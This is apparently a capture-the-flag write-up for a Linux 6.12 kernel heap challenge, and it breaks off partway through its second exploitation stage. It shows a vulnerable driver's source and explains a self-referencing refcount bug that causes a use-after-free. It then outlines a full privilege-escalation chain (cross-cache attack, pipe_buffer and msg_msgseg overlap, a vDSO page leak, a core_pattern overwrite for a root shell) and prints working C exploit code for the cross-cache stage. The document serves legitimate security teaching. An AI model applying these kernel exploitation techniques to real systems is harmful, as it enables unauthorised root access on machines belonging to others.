Level 2 - not quite baby kernel (linux kernel pwn)

Linux kernel heap pwn

This was the most challenging of the 3 pwnables, and it took me about 2 weeks to solve. It was especially hard given my lack of background in kernel pwn. Fortunately, I eventually solved it (although not in the intended way :P)

Challenge files:

The challenge provides us with the following files:

- src
  - paradox.c
  - Makefile
- bzImage
- kernel_config_linux-6.12.38
- rootfs.cpio.gz
- start.sh  

In short: paradox.c is the C source of the vulnerable Linux driver, and the Makefile specifies how to compile it. bzImage is the compressed kernel image, kernel_config_linux-6.12.38 lists all the kernel's config options, rootfs.cpio.gz is the compressed filesystem, and start.sh boots the kernel.

Before delving into paradox.c let's cover some setup first:

We start by inspecting start.sh to understand the protections the kernel has:

#!/bin/sh

cd "$(dirname "$0")" || exit 1
qemu-system-x86_64 -m 128M \
	-monitor /dev/null \
	-serial stdio \
	-smp cores=2 \
	-kernel ./bzImage \
	-initrd ./rootfs.cpio.gz \
	-nographic \
	--append "console=ttyS0 kaslr loglevel=2" \
	-nographic \
	-cpu kvm64,+smap,+smep \
	-enable-kvm 

We can see that kaslr is enabled (which means the kernel is loaded at a randomised base address), and smap and smep are enabled. This means that while in kernel mode, we cannot access data in user pages (SMAP), and we cannot execute code in user pages (SMEP).

To make it easier to debug, you should disable kaslr temporarily, and add -s to tell QEMU to open a GDB server on tcp port 1234, and -no-reboot and -no-shutdown so we can stop and see when a kernel crash occurs. Your start.sh will now look like this:

#!/bin/sh

cd "$(dirname "$0")" || exit 1
qemu-system-x86_64 -m 128M \
	-monitor /dev/null \
	-serial stdio \
	-smp cores=2 \
	-kernel ./bzImage \
	-initrd ./rootfs.cpio.gz \
	-nographic \
	--append "console=ttyS0 nokaslr loglevel=2" \
	-nographic \
	-cpu kvm64,+smap,+smep \
	-enable-kvm \
	-s \
	-no-reboot \
	-no-shutdown

To decompress rootfs.cpio.gz into an actual folder we can use the below decompress.sh:

#!/bin/sh

mkdir rootfs
cd rootfs
cp ../rootfs.cpio.gz .
gunzip ./rootfs.cpio.gz
cpio -idm < ./rootfs.cpio
rm rootfs.cpio

Now I prepare my workflow to compile exploit C code and re-compress the filesystem back into rootfs.cpio.gz, using mycompress.sh and compress.sh.

mycompress.sh:

gcc -O2 -static src/solve.c -o src/solve -lpthread
mv src/solve rootfs/solve
./compress.sh

compress.sh:

cd rootfs
find . -print0 \
| cpio --null -ov --format=newc \
| gzip -9 > rootfs.cpio.gz
mv ./rootfs.cpio.gz ../
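
With these in place, the edit-compile-boot loop is just:

$ ./mycompress.sh   # build solve.c statically and repack rootfs.cpio.gz
$ ./start.sh        # boot the kernel with the updated initramfs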

Now that the prep work is done, let's look at paradox.c:

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/fs.h>
#include <linux/refcount.h>
#include <linux/cdev.h>
#include <linux/slab.h>
#include <linux/miscdevice.h>
#include <linux/uaccess.h>
#include <linux/atomic.h>
#include <linux/list.h>
#include <linux/mutex.h> 

#define DEVICE_NAME "paradox_engine"

MODULE_LICENSE("GPL");


struct temporal_event {
	u64 event_id;
	refcount_t causal_weight;
	struct temporal_event *causal_dependency;
	char description[64];
	struct list_head timeline_node;
	struct timeline *parent_timeline;
};

struct timeline {
	u64 timeline_id;
	atomic64_t next_event_id;
	struct list_head events_head;
	struct temporal_event *caused_by_event;
	struct list_head session_node;
};

struct paradox_session_data {
	struct mutex lock; 
	struct list_head all_timelines;
	atomic64_t next_timeline_id;
};

static struct kmem_cache *temporal_event_cache;

static void event_erase_from_reality(struct temporal_event *event);

static void event_get(struct temporal_event *event) { if (event) refcount_inc(&event->causal_weight); }
static void event_put(struct temporal_event *event) { if (event && refcount_dec_and_test(&event->causal_weight)) event_erase_from_reality(event); }
static void event_erase_from_reality(struct temporal_event *event) {
	//	printk(KERN_INFO "paradox_engine: Erasing event '%s' (Timeline %llu, Event %llu) from reality.\n", event->description, event->parent_timeline->timeline_id, event->event_id);
	kfree(event);
}

static struct temporal_event* find_event_in_timeline(struct timeline *tl, u64 event_id) {
	struct temporal_event *ev;
	if (!tl) return NULL;
	list_for_each_entry(ev, &tl->events_head, timeline_node) {
		if (ev->event_id == event_id) return ev;
	}
	return NULL;
}

#define PARADOX_CREATE_TIMELINE _IOWR('k', 1, struct paradox_timeline_req)
#define PARADOX_CREATE_EVENT _IOWR('k', 2, struct paradox_event_req)

struct paradox_timeline_req {
	u64 cause_timeline_id, cause_event_id;
	u64 new_timeline_id;
};
struct paradox_event_req {
	u64 target_timeline_id;
	u64 cause_event_id;
	char description[64];
	u64 new_event_id;
};

static int paradox_engine_open(struct inode *inode, struct file *filp) {
	struct paradox_session_data *session = kzalloc(sizeof(*session), GFP_KERNEL);
	if (!session) return -ENOMEM;

	mutex_init(&session->lock);

	INIT_LIST_HEAD(&session->all_timelines);
	atomic64_set(&session->next_timeline_id, 0);

	struct timeline *primordial_tl = kzalloc(sizeof(*primordial_tl), GFP_KERNEL);
	if (!primordial_tl) { kfree(session); return -ENOMEM; }
	primordial_tl->timeline_id = atomic64_fetch_add(1, &session->next_timeline_id);
	atomic64_set(&primordial_tl->next_event_id, 0);
	INIT_LIST_HEAD(&primordial_tl->events_head);
	list_add_tail(&primordial_tl->session_node, &session->all_timelines);

	struct temporal_event *first_cause = kmem_cache_alloc(temporal_event_cache, GFP_KERNEL|__GFP_ZERO);
	if (!first_cause) { kfree(primordial_tl); kfree(session); return -ENOMEM; }
	first_cause->event_id = atomic64_fetch_add(1, &primordial_tl->next_event_id);
	refcount_set(&first_cause->causal_weight, 1);
	strcpy(first_cause->description, "The First Cause");
	first_cause->parent_timeline = primordial_tl;
	list_add_tail(&first_cause->timeline_node, &primordial_tl->events_head);

	filp->private_data = session;
	//printk(KERN_INFO "paradox_engine: New private universe created with Local Causality law.\n");
	return 0;
}

static int paradox_engine_release(struct inode *inode, struct file *filp) {
	struct paradox_session_data *session = filp->private_data;
	struct timeline *tl, *tmp_tl;
	struct temporal_event *event, *tmp_event;
	//printk(KERN_INFO "paradox_engine: Collapsing private universe.\n");
	list_for_each_entry(tl, &session->all_timelines, session_node) {
		list_for_each_entry_safe(event, tmp_event, &tl->events_head, timeline_node) {
			struct temporal_event *cause = event->causal_dependency;
			list_del(&event->timeline_node);
			while (cause) {
				struct temporal_event *next_in_chain = cause->causal_dependency;
				event_put(cause);
				cause = next_in_chain;
			}
			event->causal_dependency = NULL;
			event_put(event);
		}
	}
	//printk(KERN_INFO "paradox_engine: Final cleanup of all timelines.\n");
	list_for_each_entry_safe(tl, tmp_tl, &session->all_timelines, session_node) {
		list_del(&tl->session_node);
		if (tl->caused_by_event) event_put(tl->caused_by_event);
		kfree(tl);
	}
	kfree(session);
	return 0;
}

static long paradox_engine_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) {
	struct paradox_session_data *session = filp->private_data;
	struct timeline *target_tl = NULL, *tmp_tl;
	long ret = 0;

	mutex_lock(&session->lock);

	switch (cmd) {
		case PARADOX_CREATE_TIMELINE:
			{
				struct paradox_timeline_req req;
				if (copy_from_user(&req, (void __user *)arg, sizeof(req))) { ret = -EFAULT; break; }
				struct temporal_event *cause_event = NULL;
				list_for_each_entry(tmp_tl, &session->all_timelines, session_node) {
					if(tmp_tl->timeline_id == req.cause_timeline_id) {
						cause_event = find_event_in_timeline(tmp_tl, req.cause_event_id);
						if(cause_event) break;
					}
				}
				if (!cause_event) { ret = -EINVAL; break; }
				struct timeline *new_tl = kzalloc(sizeof(*new_tl), GFP_KERNEL);
				if (!new_tl) { ret = -ENOMEM; break; }
				new_tl->timeline_id = atomic64_fetch_add(1, &session->next_timeline_id);
				atomic64_set(&new_tl->next_event_id, 0);
				INIT_LIST_HEAD(&new_tl->events_head);
				new_tl->caused_by_event = cause_event;
				event_get(cause_event);
				list_add_tail(&new_tl->session_node, &session->all_timelines);
				req.new_timeline_id = new_tl->timeline_id;
				if (copy_to_user((void __user *)arg, &req, sizeof(req))) { ret = -EFAULT; break; }
				break;
			}

		case PARADOX_CREATE_EVENT:
			{
				struct paradox_event_req req;
				if (copy_from_user(&req, (void __user *)arg, sizeof(req))) { ret = -EFAULT; break; }
				list_for_each_entry(tmp_tl, &session->all_timelines, session_node) {
					if (tmp_tl->timeline_id == req.target_timeline_id) { target_tl = tmp_tl; break; }
				}
				if (!target_tl) { ret = -EINVAL; break; }
				struct temporal_event *event = kmem_cache_alloc(temporal_event_cache, GFP_KERNEL|__GFP_ZERO);
				if (!event) { ret = -ENOMEM; break; }
				event->event_id = atomic64_fetch_add(1, &target_tl->next_event_id);
				refcount_set(&event->causal_weight, 1);
				strncpy(event->description, req.description, sizeof(event->description) - 1);
				event->parent_timeline = target_tl;
				list_add_tail(&event->timeline_node, &target_tl->events_head);
				if (req.cause_event_id != 0) {
					struct temporal_event *cause_event = find_event_in_timeline(target_tl, req.cause_event_id);
					if (cause_event) {
						event->causal_dependency = cause_event;
						event_get(cause_event);
					}
				}
				req.new_event_id = event->event_id;
				if (copy_to_user((void __user *)arg, &req, sizeof(req))) { ret = -EFAULT; break; }
				break;
			}
		default:
			ret = -EINVAL;
	}

	mutex_unlock(&session->lock);
	return ret;
}

static const struct file_operations fops = {
	.owner = THIS_MODULE,
	.open = paradox_engine_open,
	.release = paradox_engine_release,
	.unlocked_ioctl = paradox_engine_ioctl,
};

static struct miscdevice dev;

static int dev_init(void) {
	dev.minor = MISC_DYNAMIC_MINOR;
	dev.name = DEVICE_NAME;
	dev.fops = &fops;
	dev.mode = 0644;
	temporal_event_cache = kmem_cache_create("temporal_event_cache",
			sizeof(struct temporal_event),
			0, SLAB_PANIC, NULL);
	if (!temporal_event_cache) {
		printk(KERN_ERR "paradox_engine: Failed to create slab cache.\n");
		return -ENOMEM;
	}

	if (misc_register(&dev)) {
		return -1;
	}


	return 0;
}

static void dev_cleanup(void) {
	misc_deregister(&dev);
}


module_init(dev_init);
module_exit(dev_cleanup);

To be honest, it's quite a lot of code, so let me summarise what's going on:

There are 3 main structs: temporal_event, timeline, and paradox_session_data. They have the following structures:

struct temporal_event {
	u64 event_id;
	refcount_t causal_weight;
	struct temporal_event *causal_dependency;
	char description[64];
	struct list_head timeline_node;
	struct timeline *parent_timeline;
};

struct timeline {
	u64 timeline_id;
	atomic64_t next_event_id;
	struct list_head events_head;
	struct temporal_event *caused_by_event;
	struct list_head session_node;
};

struct paradox_session_data {
	struct mutex lock; 
	struct list_head all_timelines;
	atomic64_t next_timeline_id;
};

paradox_engine_open

Every time you open("/dev/paradox_engine", O_RDONLY), the resulting file descriptor goes through paradox_engine_open, which instantiates a session by associating a fresh paradox_session_data with it. We know this because it does

filp->private_data = session;

It also instantiates a timeline object and calls it the primordial timeline, and creates a temporal_event called the first cause. Each session has a list of all timelines, while each timeline has an event it is caused by and a list of events within that timeline.

As for the temporal event, note the following:

struct temporal_event *first_cause = kmem_cache_alloc(temporal_event_cache, GFP_KERNEL|__GFP_ZERO);

The temporal event comes from its own dedicated cache. This will be important later.

Also note that this event has its refcount causal_weight set to 1.

paradox_engine_ioctl

This function essentially specifies the ways in which a user can interact with the device. In particular, they can choose to either create a timeline or create an event.

Create timeline

Request structure:

struct paradox_timeline_req {
	u64 cause_timeline_id, cause_event_id;
	u64 new_timeline_id;
};

ioctl code:

struct paradox_timeline_req req;
if (copy_from_user(&req, (void __user *)arg, sizeof(req))) { ret = -EFAULT; break; }
struct temporal_event *cause_event = NULL;
list_for_each_entry(tmp_tl, &session->all_timelines, session_node) {
	if(tmp_tl->timeline_id == req.cause_timeline_id) {
		cause_event = find_event_in_timeline(tmp_tl, req.cause_event_id);
		if(cause_event) break;
	}
}
if (!cause_event) { ret = -EINVAL; break; }
struct timeline *new_tl = kzalloc(sizeof(*new_tl), GFP_KERNEL);
if (!new_tl) { ret = -ENOMEM; break; }
new_tl->timeline_id = atomic64_fetch_add(1, &session->next_timeline_id);
atomic64_set(&new_tl->next_event_id, 0);
INIT_LIST_HEAD(&new_tl->events_head);
new_tl->caused_by_event = cause_event;
event_get(cause_event);
list_add_tail(&new_tl->session_node, &session->all_timelines);
req.new_timeline_id = new_tl->timeline_id;
if (copy_to_user((void __user *)arg, &req, sizeof(req))) { ret = -EFAULT; break; }
break;

When creating a timeline, a user must specify the timeline and its event which caused this new timeline to occur. The timeline is created with the next id available, and it is added to the session. The event that caused this timeline gets event_get called on it, which basically increases the refcount causal_weight. If the request was successful, the new timeline's id is returned to the user.

Create event

Request structure:

struct paradox_event_req {
	u64 target_timeline_id;
	u64 cause_event_id;
	char description[64];
	u64 new_event_id;
};

ioctl code:

struct paradox_event_req req;
if (copy_from_user(&req, (void __user *)arg, sizeof(req))) { ret = -EFAULT; break; }
list_for_each_entry(tmp_tl, &session->all_timelines, session_node) {
	if (tmp_tl->timeline_id == req.target_timeline_id) { target_tl = tmp_tl; break; }
}
if (!target_tl) { ret = -EINVAL; break; }
struct temporal_event *event = kmem_cache_alloc(temporal_event_cache, GFP_KERNEL|__GFP_ZERO);
if (!event) { ret = -ENOMEM; break; }
event->event_id = atomic64_fetch_add(1, &target_tl->next_event_id);
refcount_set(&event->causal_weight, 1);
strncpy(event->description, req.description, sizeof(event->description) - 1);
event->parent_timeline = target_tl;
list_add_tail(&event->timeline_node, &target_tl->events_head);
if (req.cause_event_id != 0) {
	struct temporal_event *cause_event = find_event_in_timeline(target_tl, req.cause_event_id);
	if (cause_event) {
		event->causal_dependency = cause_event;
		event_get(cause_event);
	}
}
req.new_event_id = event->event_id;
if (copy_to_user((void __user *)arg, &req, sizeof(req))) { ret = -EFAULT; break; }
break;

Once again the event is allocated from the temporal_event_cache and its data is zeroed. Its refcount is initialised to 1. The user's description is copied into the object, and the event that caused this event to happen has its refcount increased by 1. If req.cause_event_id is 0, however, that means the new event isn't caused by another event. If the request is successful, the driver returns the new event's id to the user.
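
For reference, here is a minimal sketch of the two ioctl wrappers my exploit snippets below rely on. dev_create_timeline and dev_create_event are my own helpers (not part of the challenge); the request structs and ioctl numbers are copied straight from paradox.c:

#include <stdint.h>
#include <string.h>
#include <sys/ioctl.h>

static uint64_t dev_create_timeline(int fd, uint64_t cause_tl, uint64_t cause_evt) {
    struct paradox_timeline_req req = {
        .cause_timeline_id = cause_tl,
        .cause_event_id    = cause_evt,
    };
    if (ioctl(fd, PARADOX_CREATE_TIMELINE, &req) < 0) return (uint64_t)-1;
    return req.new_timeline_id;   // id assigned by the driver
}

static uint64_t dev_create_event(int fd, uint64_t tl, uint64_t cause_evt,
                                 const char *desc) {
    struct paradox_event_req req = {
        .target_timeline_id = tl,
        .cause_event_id     = cause_evt,   // 0 means "no cause"
    };
    strncpy(req.description, desc, sizeof(req.description) - 1);
    if (ioctl(fd, PARADOX_CREATE_EVENT, &req) < 0) return (uint64_t)-1;
    return req.new_event_id;      // id assigned by the driver
}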

Looking for the vuln

For some background: reference counts are used to track how many references exist to an object, and when the refcount drops to 0 the object is usually freed. Bugs in refcount handling are a classic source of kernel vulnerabilities. This case is no different: when event_put is called on an object and its refcount goes from 1 -> 0, the object is freed:

static void event_get(struct temporal_event *event) { if (event) refcount_inc(&event->causal_weight); }
static void event_put(struct temporal_event *event) { if (event && refcount_dec_and_test(&event->causal_weight)) event_erase_from_reality(event); }
static void event_erase_from_reality(struct temporal_event *event) {
	//	printk(KERN_INFO "paradox_engine: Erasing event '%s' (Timeline %llu, Event %llu) from reality.\n", event->description, event->parent_timeline->timeline_id, event->event_id);
	kfree(event);
}

It actually took me some time (and gpting) to figure out the vuln, but eventually I realised the problem: when we create a temporal event, the event is added to its timeline BEFORE we run the following if block:

// event is added to the target timeline first!
list_add_tail(&event->timeline_node, &target_tl->events_head);
// THEN we find its cause event and set it as its causal dependency
if (req.cause_event_id != 0) {
	struct temporal_event *cause_event = find_event_in_timeline(target_tl, req.cause_event_id);
	if (cause_event) {
		event->causal_dependency = cause_event;
		event_get(cause_event);
	}
}

This results in it being possible for an event to have itself as its causal dependency.
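
Concretely, using the dev_create_event wrapper from earlier: timeline 0 already holds "The First Cause" with event_id 0, so the next event created there receives event_id 1, and requesting cause_event_id = 1 makes the lookup find the event we just inserted:

uint64_t e0 = dev_create_event(fd, 0, 1, "self-referring event");
// e0 == 1: find_event_in_timeline found the brand-new event itself, so
// its causal_dependency now points back at the event, and its refcount
// is 2 (1 from creation + 1 from event_get on itself)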

paradox_engine_release

Let's see the implication of this in paradox_engine_release, which is called when the driver is closed:

static int paradox_engine_release(struct inode *inode, struct file *filp) {
	struct paradox_session_data *session = filp->private_data;
	struct timeline *tl, *tmp_tl;
	struct temporal_event *event, *tmp_event;
	//printk(KERN_INFO "paradox_engine: Collapsing private universe.\n");
	list_for_each_entry(tl, &session->all_timelines, session_node) {
		list_for_each_entry_safe(event, tmp_event, &tl->events_head, timeline_node) {
			struct temporal_event *cause = event->causal_dependency;
			list_del(&event->timeline_node);
			while (cause) {
				struct temporal_event *next_in_chain = cause->causal_dependency;
				event_put(cause);
				cause = next_in_chain;
			}
			event->causal_dependency = NULL;
			event_put(event);
		}
	}
	//printk(KERN_INFO "paradox_engine: Final cleanup of all timelines.\n");
	list_for_each_entry_safe(tl, tmp_tl, &session->all_timelines, session_node) {
		list_del(&tl->session_node);
		if (tl->caused_by_event) event_put(tl->caused_by_event);
		kfree(tl);
	}
	kfree(session);
	return 0;
}

It iterates through each timeline. Within each timeline it iterates through each event, and walks its cause = event->causal_dependency, calling event_put every time it finds a new cause. Once that's done, the pointer to its causal_dependency is zeroed, and the event itself has event_put called on it.

Then it iterates through each timeline in the session, calling event_put on the event which caused the timeline. Finally the timeline is freed.

Thereafter, the session is freed.

Implications

If an event has itself as a causal_dependency, what happens is that when we close the driver, the loop

while (cause) {
	struct temporal_event *next_in_chain = cause->causal_dependency;
	event_put(cause);
	cause = next_in_chain;
}

perpetually has the same event as its cause, and keeps calling event_put on it. Let's look at event_put again:

static void event_put(struct temporal_event *event) { 
    if (event && refcount_dec_and_test(&event->causal_weight)) 
        event_erase_from_reality(event); 
}
static void event_erase_from_reality(struct temporal_event *event) {
	//	printk(KERN_INFO "paradox_engine: Erasing event '%s' (Timeline %llu, Event %llu) from reality.\n", event->description, event->parent_timeline->timeline_id, event->event_id);
	kfree(event);
}

What this means is that whenever the refcount causal_weight hits 0, the event gets kfreed. What happens if it goes below 0 (which occurs once the self-referring event gets freed)? refcount_t saturates rather than wrapping: the counter gets pinned at a value like 0xC0000000 or 0xBFFFFFFF. This does NOT immediately lead to a double free, and the kfree will still only occur once.
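
To spell this out (a hedged summary based on my reading of include/linux/refcount.h; exact behaviour may vary across kernel versions):

// 1 -> 0   : refcount_dec_and_test() returns true -> kfree(event)
// 0 -> -1  : returns false; the counter is reset to REFCOUNT_SATURATED
//            (0xc0000000) and the kernel emits a one-time warning
// afterwards: each decrement goes 0xc0000000 -> 0xbfffffff, trips the
//            saturation check, and gets reset again -- dec_and_test
//            never returns true again, so the kfree happens exactly
//            once while the release loop spins forever on the event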

🐛 More tips for debugging

Before exploitation, you may also find the following helpful to make debugging easier:

  • Using the linux source code for linux 6.12.38 from https://cdn.kernel.org/pub/linux/kernel/v6.x/linux-6.12.38.tar.xz, you should recompile the kernel with debugging symbols. Most CTF challenges (including this one) do not provide kernels with debugging symbols.

    • If you don't want to do this, you can also use this tool to convert the compressed bzImage into an uncompressed vmlinux, then use this tool to convert the vmlinux to an elf. This should be able to recover most symbols to make debugging easier. Then, to debug, do gdb ./kernelelf then target remote :1234 when your kernel is running

  • Use the bata24 gef debugger; it is ahead of pwndbg and the main gef fork, and comes with many features supporting kernel debugging. I found the commands pagewalk-with-hints, slub-dump, xf and slab-contains most helpful.

    • To easily find the victim object when debugging, all I needed to do was find its description using xf "self-referring event"

Verifying trivial wins

Take note that there can actually be trivial leaks in kernel challenges via dmesg or kernel warnings or similar. However, in init.sh we see these two lines:

echo 1 > /proc/sys/kernel/dmesg_restrict
echo 2 > /proc/sys/kernel/kptr_restrict

so trivial leaks are unfortunately out of the question.

I also tried to look for n-days in the given linux kernel itself, but unfortunately couldn't find any.

Exploitation

Here are the high-level steps my exploit follows, which I will elaborate on later:

  1. Perform a cross-cache attack on a self-referring event, ensuring that its page can get reclaimed by a CPU we control.

  2. Spray pipes so that one of their data pages reclaims the victim page. Write bytes into all the pipes until we find which one's page reclaimed the victim, and the offset of the victim temporal_event within that page.

  3. Spray ENLARGED pipe_buffers so that the pipe_buffer struct reclaims an order 9/10 page.

    1. Write 1 byte into each pipe fd, then read 1 byte back, to consume the first pipe_buffer slot. Subsequent writes/splices will use the second pipe_buffer in the ring.

  4. Reset the victim's refcount to 1, and partially overwrite the victim's causal_dependency (a temporal_event *) to point at the previously claimed order 9/10 page. The infinite loop then causes that page to get kfreed.

  5. Reclaim the freed order 9/10 page by spraying msg_msgseg. This "releases" the infinite loop and the CPU that was running it. We now have a msg_msgseg overlapping multiple pipe_buffers.

  6. Use the vmsplice syscall to splice a vDSO memory page into the pipes from step 3. This causes the second pipe_buffer in the UAF'd page to have its struct page pointer point at a page responsible for kernel text.

  7. Read from msg_msgseg to leak the address of the page * for kernel text.

  8. Prepare a fake pipe_buffer whose page and offset values are calculated to point at core_pattern's page, and set PIPE_BUF_FLAG_CAN_MERGE in the pipe flags.

  9. Reclaim the previously freed msg_msgseg by spraying msg_msgseg again, overwriting the second pipe_buffer in the UAF'd page with the page * for core_pattern.

  10. Write to the pipe_buffer to overwrite core_pattern, and trigger a crash to get a root shell.

Part 1. Cross-cache attack

Remember how earlier we noted that temporal events are allocated from their own dedicated cache, because of this line?:

struct temporal_event *event = kmem_cache_alloc(temporal_event_cache, GFP_KERNEL|__GFP_ZERO);

This makes exploitation more difficult: when we free a temporal_event, its page still belongs to temporal_event_cache. Other objects we allocate come from different caches, i.e. they will not reuse the freed page (and thus cannot overlap our victim object!)

But there is a technique called cross-cache attack which allows us to still make this happen. The cross-cache attack allows the victim page to be reclaimed by any other object, reopening more exploitation techniques!

To perform this technique, I found these black hat slides particularly instructional. The gist of it is:

  1. Pin task to a CPU

  2. Drain partially free slabs

  3. Allocate objs_per_slab * (1 + cpu_partial) objects (you can find these in /sys/kernel/slab/temporal_event_cache/cpu_partial and /sys/kernel/slab/temporal_event_cache/objs_per_slab )

/sys/kernel/slab/temporal_event_cache # cat cpu_partial
120
/sys/kernel/slab/temporal_event_cache # cat objs_per_slab
36

  4. Allocate objs_per_slab - 1 objects as pre-alloc objects

  5. Allocate victim object

  6. Allocate objs_per_slab + 1 objects as post-alloc objects

  7. Free victim, pre-alloc and post-alloc objects

  8. Free one object per slab from step 3

    1. This triggers flushing of the CPU partial list, allowing the victim slab to be released to the page allocator

At this point my code for the cross-cache attack looked something like this:

#define OBJS_PER_SLAB 36
#define CPU_PARTIAL 120

...
static inline void pin_this_thread_to_cpu(int cpu) {
    cpu_set_t set;
    CPU_ZERO(&set);
    CPU_SET(cpu, &set);
    int rc = pthread_setaffinity_np(pthread_self(), sizeof(set), &set);
    if (rc) { errno = rc; perror("pthread_setaffinity_np"); exit(1); }
}
...
void *freefd2() {
    pin_this_thread_to_cpu(1);
    int cpu  = sched_getcpu(); 
    printf("[+] Closing thread running on cpu %d\n", cpu);
    close(fd2);
}
...
pin_this_thread_to_cpu(0);
fd2 = open(DEVICE_PATH, O_RDONLY);
fd1 = open(DEVICE_PATH, O_RDONLY);
// getchar();
if (fd1 < 0 || fd2 < 0) die("open /dev/paradox_engine");
printf("[+] devices opened\n");
printf("[*] creating events...\n");
// drain partially-free slabs
uint64_t partiallyfrees[CPU_PARTIAL + 1];
dev_create_timeline(fd2, 0, 0);
for (int i = 0; i < 34; i++) {
    uint64_t evt;
    evt = dev_create_event(fd2, 1, 0, "fd2event-pre");
    if (evt < 0) printf("[x] evt!");
}

for (int i = 0; i < OBJS_PER_SLAB * (1 + CPU_PARTIAL); i++) {
    uint64_t evt;
    if (i % OBJS_PER_SLAB == 0) {
        // want to free later
        evt = dev_create_event(fd1, 0, 0, "fd1event");
        partiallyfrees[i / OBJS_PER_SLAB] = evt;
    } else {
        evt = dev_create_event(fd2, 1, 0, "fd2event");
    }
    if (evt < 0) printf("[x] evt!");
}
printf("[+] Creating timelines with dependencies on partially freed slab objects\n");

for (int i = 0; i < CPU_PARTIAL + 1; i++) {
    uint64_t tl = dev_create_timeline(fd1, 0, partiallyfrees[i]);
    if (tl < 0) printf("[x] tl!");
}

uint64_t preallocs[OBJS_PER_SLAB - 1];
printf("[+] Creating pre-alloc objects\n");
for (int i = 0; i < OBJS_PER_SLAB - 1; i++) {
    // pre-alloc objects
    uint64_t evt = dev_create_event(fd1, 1, 0, "pre-alloc object");
    if (evt < 0) printf("[x] evt!");
    preallocs[i] = evt;
}

printf("[*] creating self-referential event...\n");
uint64_t e0 = dev_create_event(fd2, 0, 1, "self-referring event");
printf("[+] self-ref event created: e0=%llu\n", e0);
printf("[*] Freeing self-referential event...\n");

pthread_t t;
pthread_create(&t, NULL, freefd2, NULL);

printf("[+] Creating post-alloc objects\n");
uint64_t postallocs[OBJS_PER_SLAB + 1];

for (int i = 0; i < OBJS_PER_SLAB + 1; i++) {
    uint64_t evt = dev_create_event(fd1, 1, 0, "post-alloc object");
    if (evt < 0) printf("[x] evt!");
    postallocs[i] = evt;
}
// sleep(0.01)
printf("[+] Releasing pre-alloc and post-alloc objects and one obj per partially freed slab\n");
close(fd1);
...

Note that regardless of which fd you use to create events, they all come from the same cache and pages. Essentially, the events created on fd2 would get freed first on cpu1, followed by the events created on fd1, which would get freed on cpu0.

My intention was for the (OBJS_PER_SLAB - 1) * CPU_PARTIAL objects and the self-referring event to be freed first on cpu1. Thereafter, the pre-alloc and post-alloc objects would be freed on cpu0.

This was a costly mistake, since freeing the self-referring event on cpu1 first causes the victim page to be on cpu1's per-cpu partial list, and cpu1 was the cpu with the infinite loop which I couldn't control.

🧠 The solution to this was quite simple: Instead of freeing the self-referring event first, free the pre-alloc and post-alloc objects first!

Here's the final working cross-cache code:

void *freefd2() {
    pin_this_thread_to_cpu(1);
    int cpu  = sched_getcpu(); 
    printf("[+] Closing thread running on cpu %d\n", cpu);
    close(fd2);
}
...
void *fillcpu1() {
    pin_this_thread_to_cpu(1);
    printf("[+] Filling cpu1 partial list...\n");
    for (int i = 0; i < OBJS_PER_SLAB * (1 + CPU_PARTIAL); i++) {
        uint64_t evt;
        if (i % 2 == 0) {
            // want to free later
            evt = dev_create_event(fd4, 0, 0, "fd4event-cpu1");
        } else {
            evt = dev_create_event(fd3, 0, 0, "fd3event-cpu1");
        }
    }
}
...
void *freecpu1() {
    pin_this_thread_to_cpu(1);
    printf("[+] Filling cpu1 partial list (2)...\n");
    close(fd4);
}
...
pin_this_thread_to_cpu(0);
fd1 = open(DEVICE_PATH, O_RDONLY); // for cpu0 pre-alloc obj, post-alloc obj and the partial page objs to be freed
fd2 = open(DEVICE_PATH, O_RDONLY); // uncontrollable infinite loop
fd3 = open(DEVICE_PATH, O_RDONLY); // fd3 is never closed
fd4 = open(DEVICE_PATH, O_RDONLY); // for filling cpu1 partial list
fd5 = open(DEVICE_PATH, O_RDONLY); // for filling cpu1 partial list
// getchar();
printf("[+] devices opened\n");
printf("[+] creating events...\n");

uint64_t partiallyfrees[CPU_PARTIAL + 1];
for (int i = 0; i < OBJS_PER_SLAB * (1 + CPU_PARTIAL); i++) {
    uint64_t evt;
    if (i % 2 == 0) {
        // want to free later
        evt = dev_create_event(fd1, 0, 0, "fd1event-cpu0");
        partiallyfrees[i / OBJS_PER_SLAB] = evt;
    } else {
        evt = dev_create_event(fd3, 0, 0, "fd3event-cpu0");
    }
    if (evt < 0) printf("[x] evt!");
}

pthread_t t1;
pthread_create(&t1, NULL, fillcpu1, NULL);
pthread_join(t1, NULL);
printf("[+] Creating timelines with dependencies on partially freed slab objects\n");

for (int i = 0; i < (CPU_PARTIAL + 1); i++) {
    uint64_t tl = dev_create_timeline(fd1, 0, partiallyfrees[i]);
    if (tl < 0) printf("[x] tl!");
}

uint64_t preallocs[OBJS_PER_SLAB - 1];
printf("[+] Creating pre-alloc objects\n");
for (int i = 0; i < OBJS_PER_SLAB - 1; i++) {
    // pre-alloc objects
    uint64_t evt;
    if (i % 2) {
        evt = dev_create_event(fd1, 0, 0, "pre-alloc object");
    } else {
        evt = dev_create_event(fd5, 0, 0, "pre-alloc object");
    }
    if (evt < 0) printf("[x] evt!");
    preallocs[i] = evt;
}

printf("[+] creating self-referential event...\n");
uint64_t e0 = dev_create_event(fd2, 0, 1, "self-referring event");
printf("[+] self-ref event created: e0=%llu\n", e0);

printf("[+] Creating post-alloc objects\n");
uint64_t postallocs[OBJS_PER_SLAB + 1];

for (int i = 0; i < OBJS_PER_SLAB + 1; i++) {
    uint64_t evt;
    if (i % 2) {
        evt = dev_create_event(fd1, 0, 0, "post-alloc object");
    } else {
        evt = dev_create_event(fd5, 0, 0, "post-alloc object");
    }
    if (evt < 0) printf("[x] evt!");
    postallocs[i] = evt;
}

close(fd5);
// pause();
pthread_t t2;
pthread_create(&t2, NULL, freecpu1, NULL);
pthread_join(t2, NULL);
printf("[+] Freeing self-referential event...\n");
pthread_t t;
pthread_create(&t, NULL, freefd2, NULL);
// sleep(5); // bro...
// block until the other thread enters
sleep(1);
printf("[+] Releasing pre-alloc and post-alloc objects and one obj per partially freed slab\n");
close(fd1);

Half of the pre- and post-alloc objects live on fd1, while the other half live on fd5. The self-referring object uses fd2.

The key difference is: I first close fd5 to free half the pre- and post-alloc objects on CPU 0, which gets the victim slab onto CPU 0's partial list.

With this, after the cross-cache attack my victim page was in the free area and could be reclaimed from CPU 0!

Part 2. Spraying pipe_buffer to reclaim victim page

When we inspect the victim page, this is what we will see:

...
0xffff888006494bd0|+0x0bd0|+378: 0x0000000000000001 <- victim event id
0xffff888006494bd8|+0x0bd8|+379: 0x00000000bfffffff <- victim refcount
